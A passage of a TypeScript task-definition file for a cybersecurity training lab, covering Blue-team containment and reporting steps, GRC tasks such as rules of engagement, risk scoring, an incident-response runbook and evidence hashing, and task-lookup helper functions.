              { flag: '| Out-File Win_Detection.txt', meaning: 'Save them to a file named Win_Detection.txt.' },
            ],
          },
          {
            cmd: 'New-NetFirewallRule -DisplayName "Block Attacker" -Direction Inbound -RemoteAddress <ATTACKER_IP> -Action Block',
            explain: 'Create a firewall rule that drops all incoming traffic from the attacker’s IP. Replace <ATTACKER_IP> with the address you found (or set it in the Lab access panel to auto-fill).',
            flags: [
              { flag: 'New-NetFirewallRule', meaning: 'Create a new Windows Firewall rule.' },
              { flag: '-DisplayName "Block Attacker"', meaning: 'A readable name so you can find/remove the rule later.' },
              { flag: '-Direction Inbound', meaning: 'Apply to traffic coming IN to this host.' },
              { flag: '-RemoteAddress <ATTACKER_IP>', meaning: 'The source IP to match — the attacker.' },
              { flag: '-Action Block', meaning: 'Drop matching traffic (Block; alternatives: Allow).' },
            ],
          },
        ],
        expectedOutput: 'Win_Detection.txt lists repeated 4625 events; firewall rule created',
        outputExplanation: 'Many 4625 events from one IP in a short window = a brute-force attempt; the new Block rule stops further attempts from that address.',
        whatItMeans: 'You detected and contained the attack on the Windows host, mirroring the Linux response.',
        frameworks: ['NIST_CSF', 'NIST_800_61'],
        producesDeliverable: 'Win_Detection.txt',
        isEvidenceStep: true,
        optional: true,
        troubleshooting: 'No 4625 events? Confirm logon auditing was enabled in Week 2 (blue-w2-s4) and that Red has started the brute force.',
      }
    ]
  },
  {
    id: 'blue-w4-response',
    role: 'blue',
    week: 4,
    title: 'Incident Response Findings',
    objective: 'Present detection engineering and response actions.',
    frameworks: ['NIST_800_61', 'NIST_CSF'],
    deliverables: [],
    prerequisites: ['Week 3 detection & response notes', 'IR runbook outcomes'],
    definitionOfDone: ['Detection summary written', 'Response timeline built', 'Your briefing slides drafted'],
    handoff: [{ to: 'grc', artifact: 'Detection_Summary.md', note: 'Feed detection/response results into the final report.' }],
    learn: ['Summarizing detection engineering', 'Building an incident timeline'],
    tools: ['Markdown', 'Slides'],
    steps: [
      {
        id: 'blue-w4-s1',
        title: 'Compile Detection Evidence',
        description: 'Document what you detected and when.',
        instruction: 'Record your detections and their timing in the Incident Report form.',
        whatItMeans: 'Shows detection capability and speed of response.',
        frameworks: ['NIST_800_61'],
        usesForm: 'Incident Report',
      },
      {
        id: 'blue-w4-s2',
        title: 'Build the Response Timeline',
        description: 'Build the response timeline.',
        instruction: 'Lay out your detect, contain and recover timeline in the Incident Report form.',
        whatItMeans: 'Demonstrates how fast you moved from detection to containment.',
        frameworks: ['NIST_800_61'],
        usesForm: 'Incident Report',
      },
      {
        id: 'blue-w4-s3',
        title: 'Draft Your Briefing Slides',
        description: 'Prepare your briefing slides.',
        instruction: 'Build a few briefing slides from your Incident Report — what you saw and how you responded.',
        whatItMeans: 'Your half of the final briefing is ready to combine into the team deck.',
        frameworks: ['NIST_CSF'],
      }
    ]
  }
];

// GRC (Fixers) Tasks
const GRC_TASKS: Task[] = [
  {
    id: 'grc-w0-setup',
    role: 'grc',
    week: 0,
    title: 'Open the Policy Workspace & Authorize the Engagement',
    objective: 'Set up where your company stores artifacts and put the authorized scope in writing for Red and Blue.',
    frameworks: ['ISO_27001', 'NIST_CSF'],
    deliverables: ['01_Scope_and_RoE.md'],
    learn: ['Organizing a shared evidence workspace', 'What an authorization memo / Rules of Engagement is', 'Coordinating Red and Blue as the responsible role'],
    tools: ['Markdown editor', 'mkdir / shared folder'],
    prerequisites: ['Authorization + target list (from the instructor)'],
    definitionOfDone: ['A team-artifacts folder structure exists', 'Authorized scope is written down', 'Red and Blue both received the scope'],
    handoff: [
      { to: 'red', artifact: 'Rules_of_Engagement.md', note: 'Send the authorized scope before any scanning.' },
      { to: 'blue', note: 'Tell Blue which two systems (Ubuntu + Windows) to harden.' },
    ],
    steps: [
      {
        id: 'grc-w0-s1',
        title: 'Create the Shared Workspace',
        description: 'Create the canonical per-week folders where every team artifact lives.',
        instruction: 'Create the five week folders under your home directory.',
        command: 'mkdir -p ~/team-artifacts/{week-0,week-1,week-2,week-3,week-4}',
        commandExplanation: '`mkdir -p` creates `~/team-artifacts/` plus the five week subfolders in one pass via brace expansion.',
        expectedOutput: 'Folders created (no output on success)',
        outputExplanation: 'Run `ls ~/team-artifacts/` to confirm week-0…week-4 exist.',
        whatItMeans: 'Gives every teammate one predictable drop-off path (`~/team-artifacts/week-N/`) so files never get lost or duplicated.',
        frameworks: ['ISO_27001'],
        troubleshooting: 'Permission denied? Confirm you are writing under `~/` (your home), not a system path.',
      },
      {
        id: 'grc-w0-s2',
        title: 'Draft the Rules of Engagement',
        description: 'Put the authorized scope in writing.',
        instruction: 'Write the authorized scope in the Scope and Rules of Engagement form (it exports as 01_Scope_and_RoE.md — that file IS your Rules of Engagement), then share it with Red and Blue.',
        whatItMeans: 'Sets the legal boundary Red may attack and Blue must defend.',
        frameworks: ['ISO_27001', 'NIST_CSF'],
        usesForm: 'Scope & Rules of Engagement',
      },
    ],
  },
  {
    id: 'grc-w1-framework',
    role: 'grc',
    week: 1,
    title: 'Framework Mapping & Hardening Standard',
    objective: 'Log Week 1 artifacts into the chain-of-custody register, map them to NIST CSF + CIS, and issue a Hardening Standard to Blue.',
    frameworks: ['NIST_CSF', 'CIS', 'STRIDE'],
    deliverables: ['02_Asset_Inventory.csv', '09_Framework_Mapping.md', '10_Lab_Security_Policy.md', '11_Hardening_Standard.md'],
    prerequisites: ["Red's Asset_List.md and Recon_Findings.md", "Blue's Hardening_Checklist.txt and UFW_Status.txt", 'Your Rules_of_Engagement.md from Week 0'],
    definitionOfDone: ['All four Week 1 files logged + hashed in Artifact_Register.md', 'Findings mapped to NIST CSF + CIS in Framework_Mapping.md', 'Lab_Security_Policy_v1.0.md drafted', 'Hardening_Standard.md handed to Blue'],
    handoff: [
      { to: 'blue', artifact: 'Hardening_Standard.md', note: 'The OS-specific controls Blue must implement on both hosts.' },
      { to: 'red', artifact: 'Rules_of_Engagement.md', note: 'Reconfirm Week 2 scanning stays within authorized scope.' },
    ],
    learn: ['Turning controls into policy with NIST CSF & CIS', 'Writing an actionable Hardening Standard (SOP)', 'How GRC drives Blue/Red instead of just reporting'],
    tools: ['NIST CSF', 'CIS Controls', 'Markdown'],
    steps: [
      {
        id: 'grc-w1-s1',
        title: 'Gather & log Week 1 artifacts',
        description: 'Gather the Week 1 work from your teammates.',
        instruction: 'Confirm Red and Blue dropped their Week 1 files, then enter the discovered assets into the Asset Inventory form.',
        whatItMeans: 'Brings the team Week 1 work together and starts the asset inventory.',
        frameworks: ['NIST_CSF', 'ISO_27001'],
        usesForm: 'Asset Inventory',
      },
      {
        id: 'grc-w1-s2',
        title: 'Map findings to NIST CSF',
        description: 'Map findings to NIST CSF controls.',
        instruction: 'Add each finding to the Framework Mapping form and tag its NIST CSF function + control — you will cite these in the Risk Register and Final Report.',
        whatItMeans: 'Turns raw findings into a control-by-control audit trail.',
        frameworks: ['NIST_CSF'],
        usesForm: 'Framework Mapping',
      },
      {
        id: 'grc-w1-s3',
        title: 'Append CIS Control rows',
        description: 'Map findings to CIS Controls.',
        instruction: 'In the same Framework Mapping form, fill the CIS control for each row so coverage gaps are obvious.',
        whatItMeans: 'Cross-references the same evidence against a second framework.',
        frameworks: ['CIS'],
        usesForm: 'Framework Mapping',
      },
      {
        id: 'grc-w1-s4',
        title: 'Draft Security Policy v1.0',
        description: 'Set the baseline policy.',
        instruction: 'Capture your baseline rules (no root SSH, firewall on, logging) in the Lab Security Policy form — they anchor the Scope and Final Report.',
        whatItMeans: 'Converts the framework mapping into enforceable rules every host must meet.',
        frameworks: ['ISO_27001'],
        usesForm: 'Lab Security Policy',
      },
      {
        id: 'grc-w1-s5',
        title: 'Write the Hardening Standard for Blue',
        description: 'Tell Blue which controls to apply.',
        instruction: 'List the exact controls Blue must apply in the Hardening Standard form; Blue then implements them and records the result in the Hardening Baseline form.',
        whatItMeans: 'GRC sets the standard; Blue implements it.',
        frameworks: ['CIS', 'NIST_CSF'],
        usesForm: 'Hardening Standard',
      }
    ]
  },
  {
    id: 'grc-w2-risk',
    role: 'grc',
    week: 2,
    title: 'Risk Assessment & Vulnerability-Management SOP',
    objective: 'Score the risks and write the Vulnerability-Management SOP your Blue team follows to remediate.',
    frameworks: ['NIST_CSF', 'CVSS'],
    deliverables: ['03_Risk_Register.csv', '12_VM_SOP.md'],
    prerequisites: ["Red's Vulnerability_Summary.md (the findings)", 'Your Week 1 Hardening Standard'],
    definitionOfDone: ['Risk matrix built', 'CVSS scores assigned', 'VM SOP written and handed to Blue with remediation priorities'],
    handoff: [{ to: 'blue', artifact: 'VM_SOP.md', note: 'Remediation order and process Blue follows.' }],
    learn: ['Likelihood × Impact risk scoring', 'CVSS severity', 'Writing a Vulnerability-Management SOP from a framework'],
    tools: ['CVSS', 'NIST CSF', 'Markdown'],
    steps: [
      {
        id: 'grc-w2-s1',
        title: 'Collect Vulnerability Data',
        description: 'Gather the Week 2 findings.',
        instruction: 'Confirm Red dropped the Week 2 scan findings, then open the Risk Register form.',
        whatItMeans: 'Brings the scan findings in before they drive risk decisions.',
        frameworks: ['NIST_CSF', 'ISO_27001'],
        usesForm: 'Risk Register',
      },
      {
        id: 'grc-w2-s2',
        title: 'Create Risk Matrix',
        description: 'Score each risk.',
        instruction: 'Score each risk (likelihood by impact) in the Risk Register form — the rating is computed for you.',
        whatItMeans: 'Prioritizes risks for remediation.',
        frameworks: ['NIST_CSF'],
        usesForm: 'Risk Register',
      },
      {
        id: 'grc-w2-s3',
        title: 'Assign CVSS Scores',
        description: 'Add CVSS severities.',
        instruction: 'Add a CVSS severity to each finding in the Risk Register form.',
        whatItMeans: 'Standardized severity helps prioritization.',
        frameworks: ['CVSS'],
        usesForm: 'Risk Register',
      },
      {
        id: 'grc-w2-s4',
        title: 'Write the Vulnerability-Management SOP for Blue',
        description: 'Hand Blue the remediation order.',
        instruction: 'Fill the Vulnerability-Management SOP form — the priority rule (highest risk first) and the ordered steps Blue follows to fix and verify.',
        whatItMeans: 'GRC defines the remediation process; Blue carries it out.',
        frameworks: ['NIST_CSF', 'CVSS'],
        usesForm: 'Vulnerability-Management SOP',
      }
    ]
  },
  {
    id: 'grc-w3-custody',
    role: 'grc',
    week: 3,
    title: 'Incident-Response Runbook & Chain of Custody',
    objective: 'Issue the IR runbook your Blue team follows during the breach, then preserve the evidence with chain of custody.',
    frameworks: ['NIST_800_61', 'ISO_27001'],
    deliverables: ['13_IR_Runbook.md', '14_Evidence_Log.csv', 'Evidence_Hashes.txt'],
    prerequisites: ['Week 2 VM SOP issued', "Blue's detections from Week 2 in place"],
    definitionOfDone: ['IR runbook handed to Blue before the attack', 'All evidence hashed and logged', 'Chain of custody intact'],
    handoff: [{ to: 'blue', artifact: 'IR_Runbook.md', note: 'The steps Blue follows the moment an attack is detected.' }],
    learn: ['Writing an incident-response runbook (NIST 800-61)', 'Evidence hashing & chain of custody', 'Coordinating the company during an incident'],
    tools: ['NIST 800-61', 'sha256sum', 'Markdown'],
    steps: [
      {
        id: 'grc-w3-s5',
        title: 'Write the IR Runbook for Blue (do this first)',
        description: 'Give Blue the incident-response steps.',
        instruction: 'Fill the Incident-Response Runbook form — the detect → contain → eradicate → recover → report steps Blue follows during the attack. Hand it over before Red begins.',
        whatItMeans: 'GRC prepares the response plan; Blue executes it during the attack.',
        frameworks: ['NIST_800_61'],
        usesForm: 'Incident-Response Runbook',
      },
      {
        id: 'grc-w3-s1',
        title: 'Receive Artifacts from Team',
        description: 'Receive the attack evidence from the team.',
        instruction: 'Confirm Red and Blue dropped their Week 3 evidence, then open the Incident Report form to log it.',
        whatItMeans: 'Brings every attack artifact under chain of custody as it arrives.',
        frameworks: ['NIST_800_61'],
        usesForm: 'Incident Report',
      },
      {
        id: 'grc-w3-s2',
        title: 'Hash Evidence Files',
        description: 'Create SHA256 hashes for integrity verification.',
        commands: [
          { cmd: 'cd ~/team-artifacts/week-3', explain: 'Move into the week-3 evidence folder.' },
          { cmd: 'sha256sum Attack_Pcap.pcap Attack_Logs.txt SQL_Injection_Proof.txt Brute_Force_Proof.txt Reverse_Shell_Proof.txt Evidence_Photos.zip > Evidence_Hashes.txt', explain: 'Hash every artifact to lock chain of custody; save the digests.' },
        ],
        commandExplanation: '`sha256sum` fingerprints each real attack artifact; `> Evidence_Hashes.txt` stores the hashes so any later change is detectable.',
        commandFlags: [
          { flag: 'sha256sum', meaning: 'Compute a SHA-256 fingerprint of each file.' },
          { flag: '> Evidence_Hashes.txt', meaning: 'Save the hashes to the canonical file for integrity checks.' },
        ],
        expectedOutput: 'Hash file created',
        outputExplanation: 'The file holds a 64-character hash next to each filename; re-running the command later must produce identical hashes to prove nothing was altered.',
        whatItMeans: 'Proves evidence has not been tampered with.',
        frameworks: ['NIST_800_61'],
        producesDeliverable: 'Evidence_Hashes.txt',
        isEvidenceStep: true,
        troubleshooting: '"No such file or directory"? cd into the folder that holds the evidence first (the filenames must exist there), or hash the whole folder: sha256sum ~/team-artifacts/week-3/Evidence/*. Verify later with sha256sum -c Evidence_Hashes.txt — every line must say OK.',
      },
      {
        id: 'grc-w3-s3',
        title: 'Create Evidence Log',
        description: 'Log each piece of evidence.',
        instruction: 'Record each artifact (filename, who collected it, when, its path, and its SHA-256 hash) in the Evidence Log form.',
        whatItMeans: 'A defensible chain of custody for forensics.',
        frameworks: ['NIST_800_61'],
        usesForm: 'Evidence Log',
      },
      {
        id: 'grc-w3-s4',
        title: 'Sign the Chain of Custody',
        description: 'Confirm the chain of custody.',
        instruction: 'In the Evidence Log form, fill the Transferred-to / Transferred-at columns for each hand-off so the chain is unbroken.',
        whatItMeans: 'Completes the chain of custody so the evidence holds up under scrutiny.',
        frameworks: ['ISO_27001', 'NIST_800_61'],
        usesForm: 'Evidence Log',
      },
      {
        id: 'grc-w3-s6',
        title: 'Summarize the Incident Findings',
        description: 'Summarize the incident findings.',
        instruction: 'Summarize what the breach proved, ranked by severity — this feeds the Final Report.',
        whatItMeans: 'Gives the Final Report an evidence-backed, ranked findings list.',
        frameworks: ['NIST_800_61', 'ISO_27001'],
      }
    ]
  },
  {
    id: 'grc-w4-report',
    role: 'grc',
    week: 4,
    title: 'Final Report & Presentation',
    objective: 'Compile and present all findings, recommendations, and incident response.',
    frameworks: ['ISO_27001', 'NIST_CSF'],
    deliverables: ['08_Final_Report_and_Briefing.md'],
    prerequisites: ["Red's and Blue's Week 4 briefings", 'All prior SOPs, risk register, and evidence'],
    definitionOfDone: ['Findings + recommendations compiled', 'Final report PDF produced', 'Team slides assembled'],
    handoff: [
      { to: 'red', note: 'Confirm the findings are technically accurate.' },
      { to: 'blue', note: 'Confirm the response timeline is accurate.' },
    ],
    learn: ['Compiling a professional security report', 'Synthesizing Red + Blue + GRC work', 'Writing executive recommendations'],
    tools: ['Deliverables forms', 'Markdown', 'Slides'],
    steps: [
      {
        id: 'grc-w4-s1',
        title: 'Compile Findings Document',
        description: 'Compile the findings.',
        instruction: 'Compile the findings, grouped by severity, in the Final Report and Briefing form.',
        whatItMeans: 'Aggregates all findings into one ranked list.',
        frameworks: ['ISO_27001'],
        usesForm: 'Final Report & Briefing',
      },
      {
        id: 'grc-w4-s2',
        title: 'Create Recommendations',
        description: 'Add recommendations.',
        instruction: 'Add a prioritized recommendation for each finding in the Final Report and Briefing form.',
        whatItMeans: 'Pairs each finding with an actionable fix.',
        frameworks: ['NIST_CSF'],
        usesForm: 'Final Report & Briefing',
      },
      {
        id: 'grc-w4-s3',
        title: 'Compile Final Report',
        description: 'Generate the final report.',
        instruction: 'Generate the final report from the Final Report and Briefing form (Generate, then Print or Save as PDF).',
        whatItMeans: 'Merges every section into one board-ready report.',
        frameworks: ['ISO_27001'],
        usesForm: 'Final Report & Briefing',
      },
      {
        id: 'grc-w4-s4',
        title: 'Assemble the Team Briefing Deck',
        description: 'Assemble the team briefing deck.',
        instruction: 'Assemble the team briefing deck: executive summary, Red findings, Blue response.',
        whatItMeans: 'Produces the single team briefing that ties Red, Blue and GRC together.',
        frameworks: ['ISO_27001', 'NIST_CSF'],
      }
    ]
  }
];

// Maps each evidence step to the deliverable file it contributes toward.
// Used by the guided task runner to show "this step produces <file>".
export const STEP_DELIVERABLES: Record<string, string> = {
  'red-w1-s3': 'Recon_Findings.md',
  'red-w2-s1': 'Nmap_Scan.txt',
  'red-w2-s2': 'Nikto_Report.txt',
  'red-w3-s1': 'SQL_Injection_Proof.txt',
  'red-w3-s2': 'Brute_Force_Proof.txt',
  'red-w3-s3': 'Reverse_Shell_Proof.txt',
  'red-w3-s4': 'Evidence_Photos.zip',
  'blue-w1-s3': 'UFW_Status.txt',
  'blue-w1-s5': 'Lynis_Report.txt',
  'blue-w1-s6': 'Windows_Firewall.txt',
  'blue-w1-s7': 'Defender_Status.txt',
  'blue-w2-s1': 'Baseline_Traffic.pcap',
  'blue-w2-s2': 'Wireshark_Filters.txt',
  'blue-w2-s3': 'Detection_Rules.txt',
  'blue-w2-s4': 'Win_EventLog.txt',
  'blue-w2-s5': 'Attack_Traffic.pcap',
  'blue-w3-s1': 'Attack_Pcap.pcap',
  'blue-w3-s2': 'Attack_Logs.txt',
  'blue-w3-s4': 'Containment_Actions.txt',
  'blue-w3-s5': 'Win_Detection.txt',
  'grc-w3-s2': 'Evidence_Hashes.txt',
};

export function getStepDeliverable(stepId: string): string | undefined {
  return STEP_DELIVERABLES[stepId];
}

// All deliverable filenames expected from a role for a given week.
export function getDeliverablesForWeek(role: 'red' | 'blue' | 'grc', week: number): string[] {
  const tasks = getTasksByRole(role, week);
  const set = new Set<string>();
  tasks.forEach((t) => t.deliverables.forEach((d) => set.add(d)));
  return Array.from(set);
}

// Export all tasks
export const ALL_TASKS: Task[] = [...RED_TASKS, ...BLUE_TASKS, ...GRC_TASKS];

export function getTasksByRole(role: 'red' | 'blue' | 'grc', week?: number): Task[] {
  let tasks = ALL_TASKS.filter(t => t.role === role);
  if (week) {
    tasks = tasks.filter(t => t.week === week);
  }
  return tasks;
}

export function getTaskById(id: string): Task | undefined {
  return ALL_TASKS.find(t => t.id === id);
}

export function getWeekTasks(week: number): Task[] {
  return ALL_TASKS.filter(t => t.week === week);
}
